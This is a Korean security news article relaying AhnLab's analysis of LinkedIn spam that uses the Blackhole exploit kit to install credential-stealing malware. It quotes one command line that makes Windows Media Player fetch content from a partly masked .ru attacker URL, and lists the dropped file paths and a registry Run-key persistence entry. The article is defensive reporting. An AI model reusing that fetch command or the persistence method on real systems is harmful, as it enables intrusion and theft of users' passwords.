| 링크드인 스팸 메일과 결합된 악성코드 주의! | 2012.07.22 |
블랙홀 웹 익스플로잇 툴킷과 스팸메일 결합...사용자정보 탈취목적
[보안뉴스 권 준] 사용자가 많은 유명 SNS인 링크드인(LinkedIn)의 초대 메일과 블랙홀 웹 익스플로잇 툴킷이 결합된 스팸 메일이 다시 발견돼 주의가 요구된다고 안랩 ASEC 측은 밝혔다. ASEC에서는 지난 6월 5일 웹 익스플로잇 툴킷(Web Exploit Toolkit)의 일종인 블랙홀(Blackhole) 웹 익스플로잇 툴킷이 스팸 메일과 결합되어 유포되었다는 사실을 밝힌 바 있는데, 최근 다시 발견된 것이다. 이번에 발견된 링크드인 스팸 메일과 결합된 형태로 유포된 블랙홀 웹 익스플로잇 툴킷은 아래 이미지와 같이 다양한 취약점들을 악용하고 있으며 최종적으로 감염된 PC에서 사용자 정보들을 탈취하기 위한 악성코드 감염을 목적으로 하고 있다고 ASEC 측은 밝혔다.
"C:\Program Files\Windows Media Player\wmplayer.exe" /open http://************.ru:8080/forum/data/hcp_asx.php?f=182b5" 그리고 두 번째로 자바(JAVA)와 인터넷 익스플로러(Internet Explorer)에 존재하는 알려진 취약점을 악용하기 위한 스크립트 파일이 실행된다.
세 번째로 어도비 아크로뱃 리더(Adobe Acrobat Reader)에 존재하는 알려진 취약점을 악용하기 위한 PDF 파일을 아래 이미지와 같이 다운로드 후 실행하게 된다.
해당 링크드인 스팸 메일을 수신한 PC에 위에서 언급한 4개의 취약점 중 하나라도 존재할 경우에는 동일한 시스템에서 wpbt0.dll (127,648 바이트)를 다운로드하여 다음 경로에 생성하게 된다. C:\Documents and Settings\Tester\Local Settings\Temp\wpbt0.dll 그리고 생성된 wpbt0.dll (127,648 바이트)는 다시 자신의 복사본을 아래 경로에 KB01458289.exe(127,648 바이트)라는 명칭으로 복사하게 된다.
C:\Documents and Settings\Tester\Application Data\KB01458289.exe 감염된 PC의 레지스트리에 다음 키 값을 생성하여 PC가 재부팅할 때마다 자동 실행되도록 구성됐다. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ KB01458289.exe = C:\Documents and Settings\Tester\Application Data\KB01458289.exe 그리고 감염된 PC에서 실행 중인 모든 정상 프로세스의 스레드로 자신의 코드 일부분을 삽입한 후 다음의 정보들을 후킹하게 된다. -웹 사이트 접속 정보 -FTP 시스템 접속 사용자계정과 비밀번호 정보 -POP3 이용 프로그램 사용자계정과 비밀번호 정보 -웹 폼 변조(Formgrabber) 및 웹 폼 인젝션(httpinjects)으로 웹 사이트 사용자 계정과 암호 정보 감염된 PC에서 수집된 정보들 모두는 아래 이미지와 같이 악성코드 내부에 하드코딩 되어 있는 특정 시스템들로 후킹한 데이터들 전부를 인코딩하여 전송하게 된다.
-JS/Iframe -Packed/Win32.Krap -PDF/Exploit -JS/Exploit 링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포를 시도한 악성코드는 기존에 발견된 온라인 뱅킹 정보 탈취를 목적으로 하는 제우스(Zeus) 또는 스파이아이(SpyEye)와 유사한 웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects) 기능으로 웹 사이트 사용자계정과 암호정보를 탈취할 수 있는 것으로 알려졌다. 이는 악성코드 유포자가 의도하는 대부분의 웹 사이트들에서 사용자 계정과 비밀번호 정보를 탈취할 수 있음을 뜻하는 것으로, 단순 스팸 메일로 판단되더라도 송신자가 불명확한 메일에 포함된 웹 사이트 연결 링크를 클릭하지 않는 주의가 필요하다. [권 준 기자(editor@boannews.com)] <저작권자: 보안뉴스(http://www.boannews.com/) 무단전재-재배포금지> |
|
|
|